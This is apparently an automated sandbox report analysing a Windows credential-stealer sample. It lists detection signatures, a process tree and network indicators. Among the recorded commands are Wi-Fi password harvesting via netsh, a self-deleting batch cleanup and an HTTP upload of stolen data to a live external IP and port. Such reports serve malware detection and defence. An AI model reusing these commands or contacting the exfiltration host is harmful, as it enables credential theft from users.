Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
VaXmr82RIb.exe

Overview

General Information

Sample name:VaXmr82RIb.exe
Analysis ID:1568299
MD5:3e11e285b883807eb038196ea1de3cf8
SHA1:b7346061f7e70ecabf1831fe964e4d0080b31ea9
SHA256:1003ed3cc55ba1b802f8c831b6f29dc304b163c58c222f884a22ce338fdf75c0
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Suricata IDS alerts for network traffic
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for sample
PE file contains section with special chars
Queries memory information (via WMI often done to detect virtual machines)
Queries pointing device information (via WMI, Win32_PointingDevice, often done to detect virtual machines)
Queries sensitive battery information (via WMI, Win32_Battery, often done to detect virtual machines)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
Queries sensitive printer information (via WMI, Win32_Printer, often done to detect virtual machines)
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Queries sensitive sound device information (via WMI, Win32_SoundDevice, often done to detect virtual machines)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses known network protocols on non-standard ports
Uses netsh to modify the Windows network and firewall settings
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check the online IP address of the machine
One or more processes crash
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the product ID of Windows
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Yara detected Credential Stealer

Classification

  • System is w10x64native
  • VaXmr82RIb.exe (PID: 3364 cmdline: "C:\Users\user\Desktop\VaXmr82RIb.exe" MD5: 3E11E285B883807EB038196EA1DE3CF8)
    • cmd.exe (PID: 484 cmdline: "cmd.exe" /c tasklist MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 1972 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • tasklist.exe (PID: 3528 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
    • cmd.exe (PID: 3396 cmdline: "cmd" /C chcp 65001 && netsh wlan show profiles | findstr All MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7264 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • chcp.com (PID: 5248 cmdline: chcp 65001 MD5: 41146159AA3D41A92B53ED311EE15693)
      • netsh.exe (PID: 5176 cmdline: netsh wlan show profiles MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
      • findstr.exe (PID: 7184 cmdline: findstr All MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
    • cmd.exe (PID: 6696 cmdline: "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmpF01E.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmpF01E.tmp.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 5964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • chcp.com (PID: 6076 cmdline: chcp 65001 MD5: 41146159AA3D41A92B53ED311EE15693)
      • taskkill.exe (PID: 6740 cmdline: TaskKill /F /IM 3364 MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
      • timeout.exe (PID: 7288 cmdline: Timeout /T 2 /Nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
    • WerFault.exe (PID: 2588 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3364 -s 3324 MD5: 40A149513D721F096DDF50C04DA2F01F)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
Process Memory Space: VaXmr82RIb.exe PID: 3364JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security

    Stealing of Sensitive Information

    barindex
    Source: Process startedAuthor: Joe Security: Data: Command: "cmd" /C chcp 65001 && netsh wlan show profiles | findstr All, CommandLine: "cmd" /C chcp 65001 && netsh wlan show profiles | findstr All, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\VaXmr82RIb.exe", ParentImage: C:\Users\user\Desktop\VaXmr82RIb.exe, ParentProcessId: 3364, ParentProcessName: VaXmr82RIb.exe, ProcessCommandLine: "cmd" /C chcp 65001 && netsh wlan show profiles | findstr All, ProcessId: 3396, ProcessName: cmd.exe
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-12-04T14:44:39.658760+010028438561A Network Trojan was detected192.168.11.204974789.23.100.2331488TCP

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: VaXmr82RIb.exeAvira: detected
    Source: VaXmr82RIb.exeReversingLabs: Detection: 60%
    Source: VaXmr82RIb.exeJoe Sandbox ML: detected
    Source: VaXmr82RIb.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
    Source: Binary string: System.Xml.pdbHx source: WER9BB8.tmp.dmp.17.dr
    Source: Binary string: System.Xml.ni.pdb source: WER9BB8.tmp.dmp.17.dr
    Source: Binary string: mscorlib.pdb@ source: WER9BB8.tmp.dmp.17.dr
    Source: Binary string: WINLOA~1.PDBwinload_prod.pdb source: VaXmr82RIb.exe, 00000000.00000002.30086163868.0000000007DA5000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: System.ni.pdbRSDS source: WER9BB8.tmp.dmp.17.dr
    Source: Binary string: System.Drawing.pdbRSDSp source: WER9BB8.tmp.dmp.17.dr
    Source: Binary string: System.Configuration.pdb0$; source: WER9BB8.tmp.dmp.17.dr
    Source: Binary string: Stealer.pdb source: WER9BB8.tmp.dmp.17.dr
    Source: Binary string: ntkrnlmp.pdb source: VaXmr82RIb.exe, 00000000.00000002.30086163868.0000000007DA5000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: System.IO.Compression.pdbu source: WER9BB8.tmp.dmp.17.dr
    Source: Binary string: System.Net.Http.pdbMZ source: WER9BB8.tmp.dmp.17.dr
    Source: Binary string: System.Configuration.ni.pdb source: WER9BB8.tmp.dmp.17.dr
    Source: Binary string: System.Net.Http.pdb source: WER9BB8.tmp.dmp.17.dr
    Source: Binary string: System.Security.pdb source: WER9BB8.tmp.dmp.17.dr
    Source: Binary string: System.IO.Compression.pdb source: WER9BB8.tmp.dmp.17.dr
    Source: Binary string: (3)\Stealer\obj\Release\Stealer.pdb source: VaXmr82RIb.exe
    Source: Binary string: System.Configuration.pdb source: WER9BB8.tmp.dmp.17.dr
    Source: Binary string: System.Xml.pdb source: WER9BB8.tmp.dmp.17.dr
    Source: Binary string: System.pdb source: WER9BB8.tmp.dmp.17.dr
    Source: Binary string: System.Xml.ni.pdbRSDS# source: WER9BB8.tmp.dmp.17.dr
    Source: Binary string: System.Core.ni.pdb source: WER9BB8.tmp.dmp.17.dr
    Source: Binary string: System.Windows.Forms.pdb source: WER9BB8.tmp.dmp.17.dr
    Source: Binary string: mscorlib.pdb source: WER9BB8.tmp.dmp.17.dr
    Source: Binary string: (3)\Stealer\obj\Release\Stealer.pdb, source: VaXmr82RIb.exe
    Source: Binary string: System.Management.ni.pdbRSDSJ< source: WER9BB8.tmp.dmp.17.dr
    Source: Binary string: System.Net.Http.ni.pdb source: WER9BB8.tmp.dmp.17.dr
    Source: Binary string: System.Management.pdb source: WER9BB8.tmp.dmp.17.dr
    Source: Binary string: System.Drawing.pdb source: WER9BB8.tmp.dmp.17.dr
    Source: Binary string: mscorlib.ni.pdb source: WER9BB8.tmp.dmp.17.dr
    Source: Binary string: System.Management.ni.pdb source: WER9BB8.tmp.dmp.17.dr
    Source: Binary string: System.Core.pdb source: WER9BB8.tmp.dmp.17.dr
    Source: Binary string: \??\C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\tdata*4&)G source: VaXmr82RIb.exe, 00000000.00000002.30086163868.0000000007DC4000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: mscorlib.ni.pdbRSDS] source: WER9BB8.tmp.dmp.17.dr
    Source: Binary string: System.Management.pdb.> source: WER9BB8.tmp.dmp.17.dr
    Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER9BB8.tmp.dmp.17.dr
    Source: Binary string: System.Net.Http.ni.pdbRSDS source: WER9BB8.tmp.dmp.17.dr
    Source: Binary string: System.ni.pdb source: WER9BB8.tmp.dmp.17.dr
    Source: Binary string: System.Core.ni.pdbRSDS source: WER9BB8.tmp.dmp.17.dr
    Source: Binary string: System.Security.pdb8 source: WER9BB8.tmp.dmp.17.dr

    Networking

    barindex
    Source: Network trafficSuricata IDS: 2843856 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screenshot.) M2 : 192.168.11.20:49747 -> 89.23.100.233:1488
    Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 1488
    Source: unknownNetwork traffic detected: HTTP traffic on port 1488 -> 49747
    Source: unknownNetwork traffic detected: HTTP traffic on port 1488 -> 49747
    Source: unknownNetwork traffic detected: HTTP traffic on port 1488 -> 49747
    Source: global trafficTCP traffic: 192.168.11.20:49747 -> 89.23.100.233:1488
    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: POST /upload HTTP/1.1Content-Type: multipart/form-data; boundary="f093b59e-f0fc-499e-9213-ca04fdeb1c2d"Host: 89.23.100.233:1488Content-Length: 133518Expect: 100-continueConnection: Keep-Alive
    Source: Joe Sandbox ViewIP Address: 89.23.100.233 89.23.100.233
    Source: Joe Sandbox ViewIP Address: 104.16.184.241 104.16.184.241
    Source: Joe Sandbox ViewASN Name: MAXITEL-ASRU MAXITEL-ASRU
    Source: unknownDNS query: name: icanhazip.com
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
    Source: global trafficDNS traffic detected: DNS query: icanhazip.com
    Source: global trafficDNS traffic detected: DNS query: 246.229.1.0.in-addr.arpa
    Source: unknownHTTP traffic detected: POST /upload HTTP/1.1Content-Type: multipart/form-data; boundary="f093b59e-f0fc-499e-9213-ca04fdeb1c2d"Host: 89.23.100.233:1488Content-Length: 133518Expect: 100-continueConnection: Keep-Alive
    Source: VaXmr82RIb.exe, 00000000.00000002.30075096336.0000000003728000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://89.23.100.233:1488
    Source: VaXmr82RIb.exe, 00000000.00000002.30075096336.0000000003728000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://89.23.100.233:1488/uploadt
    Source: VaXmr82RIb.exe, 00000000.00000002.30075096336.0000000003687000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://icanhazip.com
    Source: VaXmr82RIb.exe, 00000000.00000002.30075096336.0000000003687000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://icanhazip.com/
    Source: VaXmr82RIb.exe, 00000000.00000002.30075096336.0000000003687000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: tmp7983.tmp.dat.0.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
    Source: tmp7983.tmp.dat.0.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
    Source: tmp795F.tmp.dat.0.drString found in binary or memory: https://duckduckgo.com/ac/?q=
    Source: VaXmr82RIb.exe, 00000000.00000002.30079781920.00000000046BD000.00000004.00000800.00020000.00000000.sdmp, VaXmr82RIb.exe, 00000000.00000002.30079781920.0000000004723000.00000004.00000800.00020000.00000000.sdmp, VaXmr82RIb.exe, 00000000.00000002.30086163868.0000000007E71000.00000004.00000020.00020000.00000000.sdmp, VaXmr82RIb.exe, 00000000.00000002.30079781920.0000000004666000.00000004.00000800.00020000.00000000.sdmp, VaXmr82RIb.exe, 00000000.00000002.30079781920.0000000004744000.00000004.00000800.00020000.00000000.sdmp, tmp7982.tmp.dat.0.dr, tmp7981.tmp.dat.0.dr, tmp7983.tmp.dat.0.dr, tmp795D.tmp.dat.0.dr, tmp7960.tmp.dat.0.dr, tmp795F.tmp.dat.0.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
    Source: tmp795F.tmp.dat.0.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
    Source: tmp7983.tmp.dat.0.drString found in binary or memory: https://gemini.google.com/app?q=
    Source: tmp7980.tmp.dat.0.drString found in binary or memory: https://login.live.com/
    Source: VaXmr82RIb.exe, 00000000.00000002.30075096336.0000000003726000.00000004.00000800.00020000.00000000.sdmp, tmp7980.tmp.dat.0.drString found in binary or memory: https://login.live.com//
    Source: tmp7980.tmp.dat.0.drString found in binary or memory: https://login.live.com/https://login.live.com/
    Source: VaXmr82RIb.exe, 00000000.00000002.30075096336.0000000003726000.00000004.00000800.00020000.00000000.sdmp, tmp7980.tmp.dat.0.drString found in binary or memory: https://login.live.com/v104
    Source: VaXmr82RIb.exe, 00000000.00000002.30079781920.00000000046BD000.00000004.00000800.00020000.00000000.sdmp, VaXmr82RIb.exe, 00000000.00000002.30079781920.0000000004723000.00000004.00000800.00020000.00000000.sdmp, VaXmr82RIb.exe, 00000000.00000002.30086163868.0000000007E71000.00000004.00000020.00020000.00000000.sdmp, VaXmr82RIb.exe, 00000000.00000002.30079781920.0000000004666000.00000004.00000800.00020000.00000000.sdmp, VaXmr82RIb.exe, 00000000.00000002.30079781920.0000000004744000.00000004.00000800.00020000.00000000.sdmp, tmp7982.tmp.dat.0.dr, tmp7981.tmp.dat.0.dr, tmp7983.tmp.dat.0.dr, tmp795D.tmp.dat.0.dr, tmp7960.tmp.dat.0.dr, tmp795F.tmp.dat.0.drString found in binary or memory: https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search
    Source: VaXmr82RIb.exe, 00000000.00000002.30079781920.00000000046BD000.00000004.00000800.00020000.00000000.sdmp, VaXmr82RIb.exe, 00000000.00000002.30079781920.0000000004723000.00000004.00000800.00020000.00000000.sdmp, VaXmr82RIb.exe, 00000000.00000002.30086163868.0000000007E71000.00000004.00000020.00020000.00000000.sdmp, VaXmr82RIb.exe, 00000000.00000002.30079781920.0000000004666000.00000004.00000800.00020000.00000000.sdmp, VaXmr82RIb.exe, 00000000.00000002.30079781920.0000000004744000.00000004.00000800.00020000.00000000.sdmp, tmp7982.tmp.dat.0.dr, tmp7981.tmp.dat.0.dr, tmp7983.tmp.dat.0.dr, tmp795D.tmp.dat.0.dr, tmp7960.tmp.dat.0.dr, tmp795F.tmp.dat.0.drString found in binary or memory: https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
    Source: VaXmr82RIb.exe, 00000000.00000002.30079781920.00000000046BD000.00000004.00000800.00020000.00000000.sdmp, VaXmr82RIb.exe, 00000000.00000002.30079781920.0000000004723000.00000004.00000800.00020000.00000000.sdmp, VaXmr82RIb.exe, 00000000.00000002.30086163868.0000000007E71000.00000004.00000020.00020000.00000000.sdmp, VaXmr82RIb.exe, 00000000.00000002.30079781920.0000000004744000.00000004.00000800.00020000.00000000.sdmp, tmp7982.tmp.dat.0.dr, tmp7981.tmp.dat.0.dr, tmp7983.tmp.dat.0.drString found in binary or memory: https://www.ecosia.org/newtab/
    Source: VaXmr82RIb.exe, 00000000.00000002.30079781920.00000000046BD000.00000004.00000800.00020000.00000000.sdmp, VaXmr82RIb.exe, 00000000.00000002.30079781920.0000000004723000.00000004.00000800.00020000.00000000.sdmp, VaXmr82RIb.exe, 00000000.00000002.30086163868.0000000007E71000.00000004.00000020.00020000.00000000.sdmp, VaXmr82RIb.exe, 00000000.00000002.30079781920.0000000004744000.00000004.00000800.00020000.00000000.sdmp, tmp7982.tmp.dat.0.dr, tmp7981.tmp.dat.0.dr, tmp7983.tmp.dat.0.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
    Source: VaXmr82RIb.exe, 00000000.00000002.30079781920.0000000004666000.00000004.00000800.00020000.00000000.sdmp, tmp795D.tmp.dat.0.dr, tmp7960.tmp.dat.0.dr, tmp795F.tmp.dat.0.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

    System Summary

    barindex
    Source: VaXmr82RIb.exeStatic PE information: section name: .<':
    Source: VaXmr82RIb.exeStatic PE information: section name: .#x#
    Source: VaXmr82RIb.exeStatic PE information: section name: .4j;
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_036040F8 NtClose,0_2_036040F8
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_03604688 NtAllocateVirtualMemory,0_2_03604688
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_036045B0 NtProtectVirtualMemory,0_2_036045B0
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_03604AA8 NtCreateSection,0_2_03604AA8
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_036049D0 NtOpenFile,0_2_036049D0
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_03604E08 NtDeviceIoControlFile,0_2_03604E08
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_03604D40 NtQueryVolumeInformationFile,0_2_03604D40
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_03604C50 NtMapViewOfSection,0_2_03604C50
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_036040F0 NtClose,0_2_036040F0
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_03604681 NtAllocateVirtualMemory,0_2_03604681
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_036045A8 NtProtectVirtualMemory,0_2_036045A8
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_03604AA1 NtCreateSection,0_2_03604AA1
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_036049C9 NtOpenFile,0_2_036049C9
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_03604E01 NtDeviceIoControlFile,0_2_03604E01
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_03604D38 NtQueryVolumeInformationFile,0_2_03604D38
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_03604C48 NtMapViewOfSection,0_2_03604C48
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_03604E08: NtDeviceIoControlFile,0_2_03604E08
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_034ADB600_2_034ADB60
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_034AA2810_2_034AA281
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_034AC2A80_2_034AC2A8
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_034A99080_2_034A9908
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_034AA1000_2_034AA100
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_034AC0100_2_034AC010
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_034A10980_2_034A1098
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_034A8F800_2_034A8F80
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_034A8E400_2_034A8E40
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_034AB5180_2_034AB518
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_034A99A00_2_034A99A0
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_034AC0010_2_034AC001
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_034AA0F00_2_034AA0F0
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_034A10880_2_034A1088
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_034A8F700_2_034A8F70
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_034AF7000_2_034AF700
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_034A8E100_2_034A8E10
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_034A96900_2_034A9690
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_034A96A00_2_034A96A0
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_034A8DA00_2_034A8DA0
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_034ABCD20_2_034ABCD2
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_036062800_2_03606280
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_036071B00_2_036071B0
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_036035A00_2_036035A0
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_0360F4D00_2_0360F4D0
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_036024900_2_03602490
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_03608B580_2_03608B58
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_036038A00_2_036038A0
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_0360DD400_2_0360DD40
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_03600D000_2_03600D00
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_0360F3EF0_2_0360F3EF
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_036081490_2_03608149
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_036081580_2_03608158
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_036020580_2_03602058
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_0360D0F80_2_0360D0F8
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_036020D00_2_036020D0
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_036017A00_2_036017A0
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_036017B00_2_036017B0
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_036039E80_2_036039E8
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_036038700_2_03603870
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_03608E700_2_03608E70
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_03604EE00_2_03604EE0
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_0360DD320_2_0360DD32
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_03600CF00_2_03600CF0
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_078543180_2_07854318
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_0785AF900_2_0785AF90
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_07854C980_2_07854C98
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_07856A200_2_07856A20
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_0785A9E80_2_0785A9E8
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_078514080_2_07851408
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_078570A80_2_078570A8
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_078538F80_2_078538F8
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_0785C7300_2_0785C730
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_078524180_2_07852418
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_078523FE0_2_078523FE
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_078543170_2_07854317
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_0785C0180_2_0785C018
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_07854C870_2_07854C87
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_078517E40_2_078517E4
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_078513FE0_2_078513FE
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_07857E970_2_07857E97
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_078570A80_2_078570A8
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_07853B9E0_2_07853B9E
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_078538E80_2_078538E8
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_078518000_2_07851800
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_07B3E7700_2_07B3E770
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_07B312900_2_07B31290
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_07B3E1000_2_07B3E100
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_07B31E180_2_07B31E18
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_07B32CB80_2_07B32CB8
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_07B3DCA80_2_07B3DCA8
